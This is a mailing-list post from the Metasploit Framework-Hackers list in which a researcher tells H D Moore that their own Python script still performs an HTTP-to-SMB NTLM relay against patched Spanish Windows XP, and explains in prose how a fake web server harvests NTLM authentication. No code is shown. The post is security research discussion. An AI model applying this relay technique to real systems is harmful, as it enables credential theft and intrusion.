-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 H D Moore wrote: > On Monday 22 December 2008, ArcSighter Elite wrote: >> Excuse me for the one-person chat in here. >> But let me say that smb_relay of metasploit effectively fails after the >> patch. We already know that, the curious thing is my python script >> doesn't. > > What is the difference? NTLMSSP instead of NTLMv2? > > -HD > > _______________________________________________ > Framework-Hackers mailing list > Framework-Hackers@spool.metasploit.com > http://spool.metasploit.com/mailman/listinfo/framework-hackers >
I don't know yet what the truly difference is in here. But the fact is what I've posted successfully works against XP SP(2|3) Spanish. We of course need more testing, but I already known some people qualify what smb_relay does as SMB to SMB attack; and what I'm doing here is some sort of HTTP to SMB attack; in where the NTLM negotation is requested by the (fake) web server with 401 + WWW-Authenticate: NTLM. Then the client sends me his authorization field in the NTLM-Authorization field. It's a little of browser based. Of course after that, we got SMB traffic but who cares? -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFJT/tPH+KgkfcIQ8cRAg7zAKDfFdim60dM34k+gDyxjzRT3G41AwCfVsm1 rRfaYBZ6BzOW8ahSg6TGmgk= =CsHi -----END PGP SIGNATURE----- _______________________________________________ Framework-Hackers mailing list Framework-Hackers@spool.metasploit.com http://spool.metasploit.com/mailman/listinfo/framework-hackers
